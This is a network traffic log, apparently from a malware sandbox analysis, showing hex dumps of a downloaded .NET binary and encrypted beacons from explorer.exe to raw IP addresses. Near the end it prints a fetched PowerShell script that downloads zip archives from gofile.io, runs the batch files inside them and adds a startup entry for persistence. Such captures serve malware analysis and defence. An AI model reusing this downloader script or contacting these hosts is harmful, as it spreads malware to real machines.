2024-07-27 05:44:15 UTC	16384	IN	Data Raw: 72 23 1a 00 70 6f 94 01 00 0a 02 7b af 00 00 04 1f 4f 1f 19 73 95 01 00 0a 6f 96 01 00 0a 02 7b af 00 00 04 1f 1c 6f 97 01 00 0a 02 7b af 00 00 04 72 3d 1a 00 70 6f 25 01 00 0a 02 7b b0 00 00 04 17 6f c2 01 00 0a 02 7b b0 00 00 04 20 a4 00 00 00 1f 22 73 92 01 00 0a 6f 93 01 00 0a 02 7b b0 00 00 04 72 4d 1a 00 70 6f 94 01 00 0a 02 7b b0 00 00 04 20 88 00 00 00 1f 19 73 95 01 00 0a 6f 96 01 00 0a 02 7b b0 00 00 04 1f 1b 6f 97 01 00 0a 02 7b b0 00 00 04 72 6f 1a 00 70 6f 25 01 00 0a 02 22 00 00 30 41 22 00 00 c0 41 73 9e 01 00 0a 28 9f 01 00 0a 02 17 28 a0 01 00 0a 02 20 4f 03 00 00 20 b3 01 00 00 73 95 01 00 0a 28 a1 01 00 0a 02 28 a2 01 00 0a 02 7b aa 00 00 04 6f a3 01 00 0a 02 28 a2 01 00 0a 02 7b ab 00 00 04 6f a3 01 00 0a 02 28 a2 01 00 0a 02 7b ac 00 Data Ascii: r#po{Oso{o{r=po%{o{ "so{rMpo{ so{o{ropo%"0A"As(( O s(({o({o({
2024-07-27 05:44:15 UTC	16384	IN	Data Raw: 09 00 bd 30 01 00 11 00 bd 30 06 00 19 00 bd 30 0a 00 29 00 bd 30 10 00 31 00 bd 30 15 00 39 00 bd 30 15 00 41 00 bd 30 15 00 51 00 bd 30 1a 00 59 00 bd 30 06 00 71 00 bd 30 20 00 b1 00 bd 30 06 00 81 01 bd 30 06 00 91 01 bd 30 1a 00 31 02 bd 30 06 00 79 03 bd 30 26 00 81 03 bd 30 06 00 99 03 bd 30 2c 00 f1 03 78 10 3d 00 99 00 6b 34 46 00 61 00 bd 30 06 00 b9 00 bd 30 15 00 89 00 4b 13 53 00 01 04 f3 39 5b 00 09 04 bd 30 61 00 a1 00 7f 10 67 00 79 00 bd 30 72 00 19 04 5c 40 81 00 31 00 ca 18 8c 00 79 00 bd 30 15 00 21 04 bd 30 9a 00 19 02 bd 30 a0 00 19 02 c8 16 a7 00 19 02 1c 3d 06 00 19 02 cc 23 06 00 01 04 b1 3a bb 00 01 04 82 1a c2 00 01 04 26 1d c7 00 01 04 26 1d cd 00 01 04 3e 36 d2 00 81 00 bd 30 01 00 61 00 f7 1c 8c 00 49 04 fa 18 e8 00 51 04 ff Data Ascii: 000)01090A0Q0Y0q0 00010y0&00,x=k4Fa00KS9[0agy0r\@1y0!00=#:&&>60aIQ
2024-07-27 05:44:15 UTC	16384	IN	Data Raw: 6e 63 65 6c 42 75 74 74 6f 6e 00 73 65 74 5f 53 68 6f 77 4e 65 77 46 6f 6c 64 65 72 42 75 74 74 6f 6e 00 73 65 74 5f 41 63 63 65 70 74 42 75 74 74 6f 6e 00 52 75 6e 00 43 6f 6d 70 61 72 65 54 6f 00 47 65 74 50 61 74 68 54 6f 00 55 6e 64 6f 00 5f 50 53 49 6e 66 6f 00 48 6f 73 74 43 6f 6d 6d 61 6e 64 49 6e 66 6f 00 6f 72 69 67 69 6e 61 6c 55 49 43 75 6c 74 75 72 65 49 6e 66 6f 00 6f 72 69 67 69 6e 61 6c 43 75 6c 74 75 72 65 49 6e 66 6f 00 70 55 69 49 6e 66 6f 00 52 65 67 69 6f 6e 49 6e 66 6f 00 46 69 6c 65 56 65 72 73 69 6f 6e 49 6e 66 6f 00 47 65 74 56 65 72 73 69 6f 6e 49 6e 66 6f 00 76 65 72 73 69 6f 6e 49 6e 66 6f 00 67 65 74 5f 49 6e 76 6f 63 61 74 69 6f 6e 49 6e 66 6f 00 48 6f 73 74 49 6e 76 6f 63 61 74 69 6f 6e 49 6e 66 6f 00 68 52 65 73 49 6e 66 6f Data Ascii: ncelButtonset_ShowNewFolderButtonset_AcceptButtonRunCompareToGetPathToUndo_PSInfoHostCommandInfooriginalUICultureInfooriginalCultureInfopUiInfoRegionInfoFileVersionInfoGetVersionInfoversionInfoget_InvocationInfoHostInvocationInfohResInfo
2024-07-27 05:44:15 UTC	16320	IN	Data Raw: 65 72 73 69 6f 6e 3d 34 2e 30 2e 30 2e 30 2c 20 43 75 6c 74 75 72 65 3d 6e 65 75 74 72 61 6c 2c 20 50 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 62 37 37 61 35 63 35 36 31 39 33 34 65 30 38 39 80 8d 01 54 55 7f 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 50 65 72 6d 69 73 73 69 6f 6e 73 2e 53 65 63 75 72 69 74 79 50 65 72 6d 69 73 73 69 6f 6e 46 6c 61 67 2c 20 6d 73 63 6f 72 6c 69 62 2c 20 56 65 72 73 69 6f 6e 3d 34 2e 30 2e 30 2e 30 2c 20 43 75 6c 74 75 72 65 3d 6e 65 75 74 72 61 6c 2c 20 50 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 62 37 37 61 35 63 35 36 31 39 33 34 65 30 38 39 05 46 6c 61 67 73 00 04 00 00 80 95 2e 01 7f 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 50 65 72 6d 69 73 73 69 6f 6e 73 2e 50 65 72 6d 69 73 73 69 6f 6e 53 65 74 41 74 Data Ascii: ersion=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089TUSystem.Security.Permissions.SecurityPermissionFlag, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089Flags.System.Security.Permissions.PermissionSetAt
2024-07-27 05:44:15 UTC	16384	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 66 b7 ea fe 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea Data Ascii: ffffffffffffffffffffffffffffffffffffffff
2024-07-27 05:44:16 UTC	16384	IN	Data Raw: ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 07 f0 01 ff 00 00 ff 83 80 01 c1 ff 00 00 ff 90 00 00 09 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff c0 00 00 03 ff 00 00 ff f0 00 00 0f ff 00 00 ff ff 00 00 ff ff 00 00 ff ff ff ff ff ff 00 00 ff ff ff ff ff ff 00 00 ff ff ff ff ff ff 00 00 ff ff ff ff ff ff 00 00 28 00 00 00 28 00 00 00 50 00 00 00 01 00 20 00 00 00 00 00 40 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: ((P @
2024-07-27 05:44:16 UTC	16384	IN	Data Raw: 59 b1 e8 ff 59 b1 e8 be 00 00 00 00 00 00 00 00 00 00 00 00 59 b1 e8 05 59 b1 e8 5f 59 b1 e8 ab 59 b1 e8 dc 59 b1 e8 f9 59 b1 e8 ff 59 b1 e8 ff 59 b1 e8 ff 59 b1 e8 fa 59 b1 e8 de 59 b1 e8 af 59 b1 e8 65 59 b1 e8 08 00 00 00 00 00 00 00 00 e0 07 00 00 80 03 00 00 80 03 00 00 80 03 00 00 80 03 00 00 80 03 00 00 80 03 00 00 80 03 00 00 80 03 00 00 80 03 00 00 80 03 00 00 82 03 00 00 80 03 00 00 80 03 00 00 80 03 00 00 80 03 00 00 73 00 65 00 74 00 75 00 70 00 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: YYYY_YYYYYYYYYYeYsetups
2024-07-27 05:44:16 UTC	2744	IN	Data Raw: 45 89 9d d1 33 da 32 02 23 db 12 08 eb 9d 50 9c fa 75 86 2a bd c5 4d 00 ca 8b cb cd bb 22 e7 09 51 e4 8a 78 8b f8 bc fb 1f 87 c1 82 4d 7a dc b9 71 8b 5d 58 9e ee 40 fe 98 69 9b 56 fe 33 68 1e 9e fa a8 d7 ed ab f2 25 4b 1e b1 11 80 51 8c 50 71 1d 2a b6 7f 38 54 43 9a 01 6b 09 36 3a c6 76 8f 4c 0e 7f ba bb 02 a8 c2 b7 ab 7f f9 f6 e6 5a 3a c0 59 85 99 1a 3f d1 2e 39 6d a9 d1 4f 06 92 0a a9 d8 63 54 8c 5a 1a 0c d5 85 a1 3f c4 72 81 83 89 38 0d f1 59 90 16 09 f4 15 ae 3f dd d3 9b ea 5a 58 10 f0 5c 8e c5 83 76 a5 1a c6 e8 12 b5 8f 5a 5b f0 30 09 a9 78 95 23 78 a2 d9 63 6e 89 3c bb 7d 65 67 1e 4d 55 ae 23 2b a3 7a ba 9b e4 83 26 7a a2 c9 9b 98 85 ab f4 32 e1 83 c6 c8 f8 a8 97 0e 70 d6 4f 4e 78 ee 04 ae 64 b6 14 ab e4 d5 e8 ef c3 84 96 47 e4 b5 57 25 a7 92 d6 38 Data Ascii: E32#PuM"QxMzq]X@iV3h%KQPq8TCk6:vLZ:Y?.9mOcTZ?r8Y?ZX\vZ[0x#xcn<}egMU#+z&z2pONxdGW%8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	62261	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:16 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:44:16 UTC	1122	OUT	Data Raw: 59 44 66 56 68 63 50 58 46 57 31 48 64 4b 38 44 32 51 6b 43 59 56 2f 73 76 67 63 31 59 76 6d 59 4d 4b 38 48 44 6e 6e 38 66 65 66 61 2b 2b 39 54 78 37 63 46 6a 4e 76 6a 6a 58 4d 67 4c 34 41 43 73 65 35 4a 4e 4f 72 73 49 79 34 44 6b 72 50 37 34 49 47 51 48 5a 34 76 6c 42 62 33 6c 34 6e 66 76 4c 65 57 38 35 6b 37 69 49 72 36 72 70 48 79 48 4e 64 32 31 37 66 54 37 43 30 35 4f 47 64 6e 46 72 56 6a 68 38 44 4c 4b 44 6c 77 4c 30 4e 47 45 4e 54 32 68 66 4f 63 70 35 47 42 74 53 78 6f 6a 56 41 65 70 56 2b 78 34 4b 48 4d 4a 63 57 32 2b 44 4b 78 64 46 45 70 38 55 31 54 4c 4f 50 38 48 4d 58 30 6e 44 75 4a 65 35 49 63 50 5a 35 63 57 50 32 35 62 42 33 4a 36 72 32 4a 67 6f 42 63 50 30 51 43 68 59 37 71 4c 30 5a 79 73 5a 5a 79 4a 35 56 78 6a 6b 45 4a 71 68 43 5a 57 73 66 Data Ascii: YDfVhcPXFW1HdK8D2QkCYV/svgc1YvmYMK8HDnn8fefa++9Tx7cFjNvjjXMgL4ACse5JNOrsIy4DkrP74IGQHZ4vlBb3l4nfvLeW85k7iIr6rpHyHNd217fT7C05OGdnFrVjh8DLKDlwL0NGENT2hfOcp5GBtSxojVAepV+x4KHMJcW2+DKxdFEp8U1TLOP8HMX0nDuJe5IcPZ5cWP25bB3J6r2JgoBcP0QChY7qL0ZysZZyJ5VxjkEJqhCZWsf
2024-07-27 05:44:17 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:44:17 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:44:17 UTC	685	IN	Data Raw: 73 6c 56 4a 39 5a 6a 4a 42 69 35 68 78 66 45 67 6f 2f 45 4c 46 79 62 43 54 2b 43 58 34 51 64 44 65 46 62 71 53 61 68 7a 57 61 59 6d 4c 51 36 4b 67 34 38 52 43 2f 44 2f 53 51 46 65 46 63 77 6e 7a 65 57 66 43 37 52 36 6f 63 78 41 31 4f 4b 49 4d 45 55 74 77 38 67 63 71 34 66 58 54 6f 30 79 31 42 52 6b 63 53 4b 52 49 34 7a 5a 56 41 2b 58 61 56 55 53 7a 74 2b 45 67 45 44 42 68 52 67 48 47 77 59 68 51 52 41 7a 48 45 50 78 67 38 34 37 4e 57 74 73 56 62 67 6e 6c 36 53 4d 30 58 65 48 45 74 68 53 31 42 6f 2b 67 47 78 46 6e 72 58 74 41 33 4f 62 74 74 4e 36 58 4f 4d 2f 6d 2b 4a 6f 72 5a 65 49 6f 6c 4e 33 4b 50 73 6f 34 49 38 76 4c 68 49 56 61 4a 4a 6d 6c 4b 63 2f 30 5a 65 73 4b 56 58 6e 44 6f 6a 69 71 39 69 56 4e 41 51 33 61 41 35 56 46 2b 41 51 5a 49 66 4b 4d 6f 6d Data Ascii: slVJ9ZjJBi5hxfEgo/ELFybCT+CX4QdDeFbqSahzWaYmLQ6Kg48RC/D/SQFeFcwnzeWfC7R6ocxA1OKIMEUtw8gcq4fXTo0y1BRkcSKRI4zZVA+XaVUSzt+EgEDBhRgHGwYhQRAzHEPxg847NWtsVbgnl6SM0XeHEthS1Bo+gGxFnrXtA3ObttN6XOM/m+JorZeIolN3KPso4I8vLhIVaJJmlKc/0ZesKVXnDojiq9iVNAQ3aA5VF+AQZIfKMom

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	62266	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:18 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:44:18 UTC	1122	OUT	Data Raw: 41 54 33 57 56 75 32 64 68 69 75 41 6b 4f 72 7a 51 66 64 33 75 4f 42 48 51 33 68 70 41 2b 5a 30 5a 44 73 2b 4d 76 38 4d 6f 42 70 6f 42 66 34 63 62 79 39 79 4f 69 68 48 55 31 6d 34 55 51 65 39 31 53 48 52 59 74 7a 56 5a 58 6f 49 7a 69 52 38 32 59 70 56 34 48 62 78 4b 43 4e 6d 5a 7a 36 57 51 30 54 42 2f 30 64 61 57 46 79 7a 46 64 53 67 74 38 32 4e 31 2b 32 53 4b 74 79 4f 35 4e 49 48 37 42 31 61 6d 62 76 41 4f 64 62 36 4a 52 37 48 56 37 79 32 6c 6b 51 31 36 4f 61 67 34 53 48 56 38 61 44 71 79 47 37 52 59 53 62 51 4b 32 39 4c 52 75 36 53 50 41 4e 39 77 4d 2f 58 48 45 5a 79 75 6b 4e 47 4b 38 4b 5a 37 50 56 72 39 2f 67 43 6e 49 49 52 63 55 4b 67 71 51 2b 67 69 63 6d 2b 7a 6d 69 65 6f 63 5a 6e 35 70 57 53 4d 75 4e 54 4d 33 4e 5a 6c 49 33 70 53 62 45 41 31 51 48 Data Ascii: AT3WVu2dhiuAkOrzQfd3uOBHQ3hpA+Z0ZDs+Mv8MoBpoBf4cby9yOihHU1m4UQe91SHRYtzVZXoIziR82YpV4HbxKCNmZz6WQ0TB/0daWFyzFdSgt82N1+2SKtyO5NIH7B1ambvAOdb6JR7HV7y2lkQ16Oag4SHV8aDqyG7RYSbQK29LRu6SPAN9wM/XHEZyukNGK8KZ7PVr9/gCnIIRcUKgqQ+gicm+zmieocZn5pWSMuNTM3NZlI3pSbEA1QH
2024-07-27 05:44:19 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:44:19 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:44:19 UTC	685	IN	Data Raw: 58 59 2f 35 33 46 51 6d 46 71 59 56 73 70 44 4a 61 4a 7a 36 69 54 76 70 55 73 37 79 4e 74 54 69 42 76 6f 4f 39 78 34 51 36 6e 52 6e 75 69 65 54 61 73 34 6e 6f 42 48 48 6c 39 71 57 56 47 75 53 44 70 7a 4e 4f 46 49 5a 32 61 64 55 79 4e 53 72 32 51 39 39 56 49 37 37 55 42 38 4c 51 4b 37 53 77 72 64 47 50 76 65 49 42 39 2b 78 56 70 2f 47 34 4b 79 34 75 61 76 48 2f 66 57 33 74 33 6c 48 4e 67 68 6a 55 30 67 46 59 36 55 74 31 45 73 6c 53 64 70 6b 48 74 30 59 71 46 6b 41 45 7a 4f 73 70 46 72 53 45 6c 44 47 53 70 6c 69 72 6f 72 4a 6a 44 6f 4e 4d 4a 64 52 44 34 75 5a 34 68 2b 41 4d 73 37 79 50 51 65 64 31 44 73 36 2b 65 79 4f 68 5a 47 38 66 32 72 75 39 52 37 50 78 73 49 56 74 73 78 41 56 54 56 58 5a 59 4c 50 51 4a 30 56 46 4b 35 45 44 2f 79 38 71 68 76 38 4e 6f 31 Data Ascii: XY/53FQmFqYVspDJaJz6iTvpUs7yNtTiBvoO9x4Q6nRnuieTas4noBHHl9qWVGuSDpzNOFIZ2adUyNSr2Q99VI77UB8LQK7SwrdGPveIB9+xVp/G4Ky4uavH/fW3t3lHNghjU0gFY6Ut1EslSdpkHt0YqFkAEzOspFrSElDGSplirorJjDoNMJdRD4uZ4h+AMs7yPQed1Ds6+eyOhZG8f2ru9R7PxsIVtsxAVTVXZYLPQJ0VFK5ED/y8qhv8No1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	62270	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:20 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:44:20 UTC	1122	OUT	Data Raw: 64 59 52 31 4a 59 68 62 6a 76 69 5a 78 36 37 55 6a 64 6a 2f 72 56 5a 52 73 4b 41 35 4d 2f 35 72 50 4d 50 55 39 53 59 41 2b 68 77 34 4d 67 63 67 50 79 77 78 5a 79 74 42 74 50 74 55 32 71 64 77 48 5a 55 42 73 70 7a 42 76 48 38 75 36 36 2f 47 54 36 47 4f 67 46 6c 49 45 65 47 58 34 74 4b 6c 43 38 4c 55 45 44 68 69 59 6d 42 53 6f 62 7a 71 72 68 42 67 54 6c 43 73 42 50 4e 67 6a 5a 5a 32 33 49 74 50 75 30 46 4c 57 41 73 45 48 2f 66 65 64 4d 6f 4a 7a 4f 73 4b 62 66 72 64 34 6b 4c 36 7a 4a 67 68 57 53 7a 6f 4c 41 55 67 54 32 6f 31 58 66 36 5a 30 61 47 6b 46 37 37 61 7a 6b 41 56 48 67 32 72 47 78 4b 36 74 55 71 56 48 36 43 66 71 7a 2f 6b 4e 6e 43 79 35 39 6c 45 35 38 6f 67 32 71 50 69 70 39 46 39 33 63 36 41 6f 74 77 63 57 4b 67 74 37 6f 63 46 6a 64 45 30 54 63 34 Data Ascii: dYR1JYhbjviZx67Ujdj/rVZRsKA5M/5rPMPU9SYA+hw4MgcgPywxZytBtPtU2qdwHZUBspzBvH8u66/GT6GOgFlIEeGX4tKlC8LUEDhiYmBSobzqrhBgTlCsBPNgjZZ23ItPu0FLWAsEH/fedMoJzOsKbfrd4kL6zJghWSzoLAUgT2o1Xf6Z0aGkF77azkAVHg2rGxK6tUqVH6Cfqz/kNnCy59lE58og2qPip9F93c6AotwcWKgt7ocFjdE0Tc4
2024-07-27 05:44:22 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:44:21 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:44:22 UTC	685	IN	Data Raw: 57 66 59 36 30 65 74 55 6a 61 4c 6a 59 66 48 5a 57 45 55 69 70 50 71 51 4b 6a 7a 4c 53 45 33 66 68 57 6a 35 7a 50 41 49 32 73 4c 72 74 4a 68 4b 7a 6f 75 6d 69 54 4f 72 41 75 67 35 2f 44 61 6e 6b 71 35 67 35 46 70 41 67 51 2b 4d 56 74 51 4a 48 54 6c 63 6c 70 72 4f 7a 70 44 70 53 59 42 78 6f 2f 2b 74 56 67 65 48 44 62 4a 4f 66 47 57 4f 6a 61 71 6f 35 49 50 51 69 63 4c 46 33 77 54 6e 55 4f 65 36 51 43 39 66 4c 79 69 2b 71 6d 70 65 4f 53 78 5a 49 68 57 2f 62 75 44 55 50 57 72 4b 6a 7a 59 66 4e 33 51 61 4b 64 48 7a 49 36 66 59 7a 6a 41 61 45 67 38 4f 49 62 64 4d 68 43 37 74 59 76 4f 6f 6e 4b 50 4f 38 4a 34 53 36 30 57 47 72 4c 43 48 58 78 2f 53 62 52 46 4b 50 6a 56 7a 51 57 39 34 53 7a 61 55 71 61 54 78 57 43 5a 2b 59 56 35 47 62 6b 52 41 66 49 6f 4d 54 32 74 Data Ascii: WfY60etUjaLjYfHZWEUipPqQKjzLSE3fhWj5zPAI2sLrtJhKzoumiTOrAug5/Dankq5g5FpAgQ+MVtQJHTlclprOzpDpSYBxo/+tVgeHDbJOfGWOjaqo5IPQicLF3wTnUOe6QC9fLyi+qmpeOSxZIhW/buDUPWrKjzYfN3QaKdHzI6fYzjAaEg8OIbdMhC7tYvOonKPO8J4S60WGrLCHXx/SbRFKPjVzQW94SzaUqaTxWCZ+YV5GbkRAfIoMT2t

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	62275	104.26.2.16	443	3664	C:\Users\user\AppData\Local\Temp\2D42.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:23 UTC	167	OUT	GET /microgods/raw HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-CH) WindowsPowerShell/5.1.19041.1682 Host: rentry.co Connection: Keep-Alive
2024-07-27 05:44:23 UTC	700	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 05:44:23 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2509 Connection: close vary: Origin x-xss-protection: 1; mode=block x-content-type-options: nosniff strict-transport-security: max-age=31536000; includeSubDomains Cache-Control: Vary CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gOWv%2B8WqR7m8B1cIUyMNd%2Bu8DeOyAcUPtGBvBQzoR8z0ruTQ8csJ0OgvaZBqkhjH77GSyVo%2FsAAMxhPUVjHVaM8NpP4MOkcf1DQgm%2BaiKrlcUxUkEokptWiSdA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9a5139eed842dd-EWR
2024-07-27 05:44:23 UTC	669	IN	Data Raw: 24 75 72 6c 31 20 3d 20 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 34 2e 67 6f 66 69 6c 65 2e 69 6f 2f 64 6f 77 6e 6c 6f 61 64 2f 64 69 72 65 63 74 2f 36 62 32 34 65 63 39 37 2d 32 61 38 64 2d 34 36 38 64 2d 61 32 34 64 2d 63 38 30 38 31 63 64 61 31 64 61 62 2f 76 6d 2e 7a 69 70 22 0d 0a 24 75 72 6c 32 20 3d 20 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 34 2e 67 6f 66 69 6c 65 2e 69 6f 2f 64 6f 77 6e 6c 6f 61 64 2f 64 69 72 65 63 74 2f 30 36 35 36 63 35 63 66 2d 35 31 62 34 2d 34 66 61 34 2d 61 65 34 38 2d 38 65 65 35 65 64 33 64 31 34 32 65 2f 6c 6d 2e 7a 69 70 22 0d 0a 24 74 65 6d 70 44 69 72 31 20 3d 20 5b 53 79 73 74 65 6d 2e 49 4f 2e 50 61 74 68 5d 3a 3a 43 6f 6d 62 69 6e 65 28 24 65 6e 76 3a 54 45 4d 50 2c 20 22 45 78 74 72 61 63 74 65 64 56 65 6e 6f Data Ascii: $url1 = "https://store4.gofile.io/download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip"$url2 = "https://store4.gofile.io/download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip"$tempDir1 = [System.IO.Path]::Combine($env:TEMP, "ExtractedVeno
2024-07-27 05:44:23 UTC	1369	IN	Data Raw: 69 72 65 63 74 6f 72 79 0d 0a 20 20 20 20 29 0d 0a 20 20 20 20 24 62 61 74 46 69 6c 65 73 20 3d 20 47 65 74 2d 43 68 69 6c 64 49 74 65 6d 20 2d 50 61 74 68 20 24 64 69 72 65 63 74 6f 72 79 20 2d 46 69 6c 74 65 72 20 2a 2e 62 61 74 20 2d 46 69 6c 65 0d 0a 20 20 20 20 66 6f 72 65 61 63 68 20 28 24 62 61 74 46 69 6c 65 20 69 6e 20 24 62 61 74 46 69 6c 65 73 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 2d 46 69 6c 65 50 61 74 68 20 22 63 6d 64 2e 65 78 65 22 20 2d 41 72 67 75 6d 65 6e 74 4c 69 73 74 20 22 2f 63 20 24 28 24 62 61 74 46 69 6c 65 2e 46 75 6c 6c 4e 61 6d 65 29 22 20 2d 57 6f 72 6b 69 6e 67 44 69 72 65 63 74 6f 72 79 20 24 64 69 72 65 63 74 6f 72 79 20 2d 4e 6f 4e 65 77 57 69 6e 64 6f 77 0d 0a 20 20 20 20 7d 0d Data Ascii: irectory ) $batFiles = Get-ChildItem -Path $directory -Filter *.bat -File foreach ($batFile in $batFiles) { Start-Process -FilePath "cmd.exe" -ArgumentList "/c $($batFile.FullName)" -WorkingDirectory $directory -NoNewWindow }
2024-07-27 05:44:23 UTC	471	IN	Data Raw: 6c 65 73 49 6e 44 69 72 32 2e 43 6f 75 6e 74 20 2d 67 74 20 30 29 20 7b 0d 0a 20 20 20 20 52 75 6e 2d 42 61 74 46 69 6c 65 73 20 2d 64 69 72 65 63 74 6f 72 79 20 24 74 65 6d 70 44 69 72 31 0d 0a 20 20 20 20 52 75 6e 2d 42 61 74 46 69 6c 65 73 20 2d 64 69 72 65 63 74 6f 72 79 20 24 74 65 6d 70 44 69 72 32 0d 0a 0d 0a 20 20 20 20 24 62 61 74 46 69 6c 65 31 20 3d 20 47 65 74 2d 43 68 69 6c 64 49 74 65 6d 20 2d 50 61 74 68 20 24 74 65 6d 70 44 69 72 31 20 2d 46 69 6c 74 65 72 20 2a 2e 62 61 74 20 2d 46 69 6c 65 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 46 69 72 73 74 20 31 0d 0a 20 20 20 20 69 66 20 28 24 62 61 74 46 69 6c 65 31 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 41 64 64 2d 56 62 73 54 6f 53 74 61 72 74 75 70 20 2d 62 61 74 46 69 6c 65 50 61 Data Ascii: lesInDir2.Count -gt 0) { Run-BatFiles -directory $tempDir1 Run-BatFiles -directory $tempDir2 $batFile1 = Get-ChildItem -Path $tempDir1 -Filter *.bat -File \| Select-Object -First 1 if ($batFile1) { Add-VbsToStartup -batFilePa

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	62274	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:23 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
